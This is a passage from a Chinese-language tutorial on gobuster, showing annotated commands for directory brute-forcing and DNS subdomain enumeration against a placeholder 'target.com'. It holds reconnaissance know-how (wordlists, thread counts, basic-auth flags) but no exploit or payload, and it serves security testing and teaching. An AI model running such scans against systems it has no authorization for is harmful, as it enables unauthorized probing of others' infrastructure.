http://target.com # url -w /usr/share/wordlists/dirb/common.txt #所用字典 -t 100 # 线程数 -o scan_results.txt # 输出到文件 -x php,html,txt # 文件扩展名 -s 200,204,301,302,307 # 成功状态码 -b 403,404 # 黑名单状态码 -k # 跳过 SSL 验证 -r # 跟随重定向 -f # 在目录后添加斜杠 -U admin -P password # 基本认证 ``` > DNS 子域枚举模式 (dns) ```bash # 基本子域枚举 gobuster dns -d target.com -w /usr/share/wordlists/dns/subdomains-top1million-5000.txt # 使用自定义 DNS 服务器 gobuster dns -d target.com -w wordlist.txt -r 8.8.8.8 # 显示 IP 地址 gobuster dns -d target.com -w wordlist.txt -i ``` ```bash # 完整 DNS 扫描示例 gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 # 线程数 -r 1.1.1.1 # DNS 服务器 -i # 显示 IP -o dns_results.txt # 输出文件 --wildcard # 通配符检测 --timeout 10s # 超时时间 ``` > 更多模型可通过gobuster [模式名] -h 进行查看
毛林
2025年10月3日 18:27
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码